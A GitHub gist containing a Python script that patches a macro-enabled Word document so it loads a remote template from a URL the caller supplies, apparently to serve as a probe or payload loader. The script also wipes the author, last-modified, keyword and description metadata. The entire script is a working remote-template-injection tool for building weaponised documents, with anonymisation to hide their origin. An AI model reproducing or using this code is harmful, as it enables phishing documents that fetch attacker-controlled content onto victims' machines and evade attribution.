Created
November 20, 2020 07:26
-
-
Save akkuman/bff0535c159afe5d28ac011c03db734a to your computer and use it in GitHub Desktop.
docm远程加载url探针
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import uuid | |
import shutil | |
import zipfile | |
import lxml.etree | |
def inplace_change(filename, old_string, new_string): | |
"""打开文件替换字符串""" | |
s = '' | |
with open(filename) as f: | |
s = f.read() | |
if old_string not in s: | |
return | |
with open(filename, 'w') as f: | |
s = s.replace(old_string, new_string) | |
f.write(s) | |
def zip_folder(dirpath, zippath): | |
"""将一个文件夹下所有文件zip打包 | |
Args: | |
dirpath: 需要打包的文件夹路径 | |
zippath: 输出的zip文件的路径 | |
""" | |
with zipfile.ZipFile(zippath, 'w') as zip_handler: | |
for root, dirs, files in os.walk(dirpath): | |
for file in files: | |
# 主要是为了zip打包层级考虑 | |
abspath = os.path.join(root, file) | |
relpath = os.path.relpath(abspath, dirpath) | |
zip_handler.write(abspath, relpath) | |
def docpatch(document_path: str, url: str, tempdir: str) -> str: | |
"""修改docm文件支持远程加载url | |
Args: | |
document_path: docm文件路径 | |
url: 需要加载的url | |
tempdir: 存放临时文件的目录 | |
Returns: | |
处理后的docm文件的地址 | |
References: | |
- https://github.com/chrismaddalena/DocPatch | |
""" | |
uid_name = str(uuid.uuid4()) | |
_tempdir = os.path.join(tempdir, uid_name) | |
core_xml_loc = f"{_tempdir}/docProps/core.xml" | |
settings_file_loc = f"{_tempdir}/word/settings.xml" | |
theme_file_loc = f"{_tempdir}/word/_rels/settings.xml.rels" | |
themes_value = f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\ | |
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">\ | |
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" \ | |
Target="{url}" TargetMode="External"/></Relationships>' | |
# 创建临时文件夹 | |
if not os.path.exists(_tempdir): | |
os.makedirs(_tempdir) | |
# 解压doc文件编辑XML | |
try: | |
with zipfile.ZipFile(document_path, 'r') as zip_handler: | |
zip_handler.extractall(_tempdir) | |
except Exception as e: | |
print("[!] Oops! The document could not be unzipped. Are you sure it's a valid macro-enabled Word document?") | |
print(f"L.. Details: {str(e)}") | |
# 编辑 settings.xml 和 settings.xml.rels 中的样式表 | |
inplace_change(settings_file_loc, '</w:settings>', '<w:attachedTemplate r:id="rId1"/></w:settings>') | |
with open(theme_file_loc, 'w') as fh: | |
fh.write(themes_value) | |
# 编辑 docProps/core.xml 重写元数据 | |
# 声明xml解析时的命名空间 | |
dc_ns = {'dc': 'http://purl.org/dc/elements/1.1/'} | |
cp_ns = {'cp': 'http://schemas.openxmlformats.org/package/2006/metadata/core-properties'} | |
# 最后修改者名字 | |
user_name = "Anonymous" | |
# 解析xml并更新 | |
root = lxml.etree.parse(core_xml_loc) | |
creator = root.xpath('//dc:creator', namespaces=dc_ns) | |
last_modified_user = root.xpath('//cp:lastModifiedBy', namespaces=cp_ns) | |
if creator: | |
creator[0].text = user_name | |
if last_modified_user: | |
last_modified_user[0].text = user_name | |
tags = root.xpath('//cp:keywords', namespaces=cp_ns) | |
if tags: | |
tags[0].text = "None" | |
description = root.xpath('//dc:description', namespaces=dc_ns) | |
if description: | |
description[0].text = "None" | |
# 更新写入 core.xml 内容 | |
with open(core_xml_loc, 'wb') as fh: | |
fh.write(b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n') | |
fh.write(lxml.etree.tostring(root)) | |
# 使用新的XML打包doc | |
suffix = os.path.splitext(document_path)[1] | |
result_filename = f'{uid_name}{suffix}' | |
result_filepath = os.path.join(tempdir, result_filename) | |
zip_folder(_tempdir, result_filepath) | |
# 删除临时目录 | |
shutil.rmtree(_tempdir) | |
return result_filepath | |
if __name__ == "__main__": | |
import sys | |
if len(sys.argv) != 3: | |
print(f'python {sys.argv[0]} docm文件 加载的url') | |
sys.exit(1) | |
docpath = os.path.abspath(sys.argv[1]) | |
url = sys.argv[2] | |
tempdir = os.path.dirname(docpath) | |
res = docpatch(docpath, url, tempdir) | |
print(res) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment